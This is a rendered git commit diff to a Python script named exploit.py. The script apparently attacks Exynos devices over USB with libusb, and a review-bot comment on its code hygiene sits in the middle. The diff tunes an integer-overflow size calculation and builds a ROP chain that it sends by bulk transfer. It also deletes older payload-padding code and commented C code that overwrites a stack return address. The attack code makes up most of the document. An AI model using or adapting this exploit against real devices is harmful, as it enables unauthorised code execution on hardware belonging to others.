removed static code
This commit is contained in:
parent
ead9a8a197
commit
d7a740d173
73
exploit.py
73
exploit.py
@ -92,8 +92,9 @@ class ExynosDevice():
|
||||
current_offset = TARGET_OFFSETS[self.target][0]
|
||||
transferred = ctypes.c_int()
|
||||
|
||||
size_to_overflow = 0x100000000 - current_offset + TARGET_OFFSETS[self.target][1] + 8 + 6
|
||||
size_to_overflow = 0x100000000 - current_offset + TARGET_OFFSETS[self.target][1] + 8 + 6
|
||||
max_payload_size = 0x100000000 - size_to_overflow
|
||||
ram_size = ((size_to_overflow % CHUNK_SIZE) % BLOCK_SIZE)
|
||||
|
||||
# max_payload_size = 0xffffffff - current_offset + DL_BUFFER_SIZE + TARGET_OFFSETS[self.target][1]
|
||||
# max_payload_size = (TARGET_OFFSETS[self.target][2] - TARGET_OFFSETS[self.target][0]) - 0x200
|
||||
@ -133,11 +134,8 @@ class ExynosDevice():
|
||||
cnt += 1
|
||||
print(f"{cnt} {hex(current_offset)}")
|
||||
|
||||
rop_chain = (b"\x00" * 0x110) + p64(TARGET_OFFSETS[self.target][0]) + (b"\x00" * 2)
|
||||
# p_offset = (TARGET_OFFSETS[self.target][1] - current_offset)
|
||||
# rop_chain = rop_chain[:p_offset] + (p64(TARGET_OFFSETS[self.target][0]))
|
||||
# rop_chain = p64(TARGET_OFFSETS[self.target][0]) * 32
|
||||
# Should
|
||||
# Build ROP chain.
|
||||
rop_chain = (b"\x00" * (ram_size - 6)) + p64(TARGET_OFFSETS[self.target][0]) + (b"\x00" * 2)
|
||||
transferred = ctypes.c_int(0)
|
||||
res = libusb1.libusb_bulk_transfer(self.handle._USBDeviceHandle__handle, ENDPOINT_BULK_OUT, rop_chain, len(rop_chain), ctypes.byref(transferred), 0)
|
||||
# assert transferred.value == len(rop_chain), "Error sending ROP chain"
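Review bot: Commented-out code still survives on the new side of this hunk and of the first one, although the commit is titled "removed static code": `# assert transferred.value == len(rop_chain), "Error sending ROP chain"` right after the bulk transfer, and the two `# max_payload_size = ...` lines that close the first hunk. Either drop them or restore the check, because `res` from `libusb_bulk_transfer` is assigned and never read in the visible lines, so a short or failed transfer is not reported. The new `rop_chain` line (inferred from the hunk line counts, since the rendering drops the +/- markers) uses `ram_size - 6` while the first hunk computes `size_to_overflow` with `+ 8 + 6`; a one-line comment stating what the 6 and the 8 account for would let the two hunks be read together, as `ram_size` is defined forty lines earlier. `transferred` is also constructed twice, `ctypes.c_int()` in the first hunk and `ctypes.c_int(0)` here, so the earlier one is dead. The enclosing method of `ExynosDevice` begins before the first hunk.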
|
||||
@ -146,70 +144,7 @@ class ExynosDevice():
|
||||
res = libusb1.libusb_bulk_transfer(self.handle._USBDeviceHandle__handle, ENDPOINT_BULK_IN, buf, len(buf), ctypes.byref(transferred), 1000)
|
||||
|
||||
|
||||
padding_size = TARGET_OFFSETS[self.target][1] - TARGET_OFFSETS[self.target][0]
|
||||
padding_size -= len(payload)
|
||||
|
||||
|
||||
# Construct payload, we can only overflow with 1 transfer.
|
||||
dl_buf_current = DL_BUFFER_START
|
||||
|
||||
if len(payload) > MAX_PAYLOAD_SIZE:
|
||||
print("payload too big!")
|
||||
return
|
||||
|
||||
payload = payload + ((MAX_PAYLOAD_SIZE - len(payload)) * b"\xcc")
|
||||
payload = struct.pack("<II", 0, MAX_PAYLOAD_SIZE) + \
|
||||
payload + struct.pack("H", 0)
|
||||
|
||||
assert (len(payload) == BLOCK_SIZE)
|
||||
|
||||
|
||||
# while True:
|
||||
# print(".", end="")
|
||||
# self.write(b"")
|
||||
|
||||
|
||||
padding_size = TARGET_OFFSETS[self.target][1] - \
|
||||
TARGET_OFFSETS[self.target][0]
|
||||
|
||||
padding_size -= MAX_PAYLOAD_SIZE
|
||||
padding_size += 8
|
||||
|
||||
chunk_cnt = padding_size // CHUNK_SIZE
|
||||
padding_size = padding_size % CHUNK_SIZE
|
||||
block_cnt = padding_size // BLOCK_SIZE
|
||||
padding_size = padding_size % BLOCK_SIZE
|
||||
|
||||
if (padding_size == 0 and block_cnt > 0):
|
||||
block_cnt -= 1
|
||||
padding_size = BLOCK_SIZE
|
||||
|
||||
|
||||
ram_size = padding_size + 4 + 2
|
||||
|
||||
# # Reconstruct stack
|
||||
ram = b"\xcc" * ram_size
|
||||
ram = ram[:padding_size] + p32(TARGET_OFFSETS[self.target][0]) + ram[padding_size + 4:]
|
||||
|
||||
# *(uint32_t*)&ram[padding_size] = targets[target_id][XFER_BUFFER];//overwriting return address in stack :]
|
||||
payload_size = len(payload) + (CHUNK_SIZE * chunk_cnt) + (BLOCK_SIZE * block_cnt) + ram_size
|
||||
pass
|
||||
# payload->size = original_payload_size + (CHUNK_SIZE * chunk_cnt) + (BLOCK_SIZE * block_cnt) + ram_size;
|
||||
# dprint("malicious payload->size=0x%x\n", payload->size);
|
||||
|
||||
# uint32_t min_size_to_overflw = (uint32_t)0 - targets[target_id][XFER_BUFFER];
|
||||
# dprint("min_size_to_overflw = 0x%x\n", min_size_to_overflw);
|
||||
# if(min_size_to_overflw > payload->size)
|
||||
# printf("ERROR : min_size_to_overflw > payload->size\n");
|
||||
|
||||
# // step 3 : usb communication
|
||||
# printf("- exploit: sending payload...\n");
|
||||
# rc = libusb_bulk_transfer(handle, LIBUSB_ENDPOINT_OUT | 2, (uint8_t*)payload, original_payload_size, &transferred, 0);
|
||||
# if(rc) {
|
||||
# printf("libusb_bulk_transfer LIBUSB_ENDPOINT_OUT: error %d\n", rc);
|
||||
# fprintf(stderr, "Error libusb_bulk_transfer: %s\n", libusb_error_name(rc));
|
||||
# return rc;
|
||||
# }
|
||||
|
||||
|
||||
if __name__ == "__main__":
|
||||
|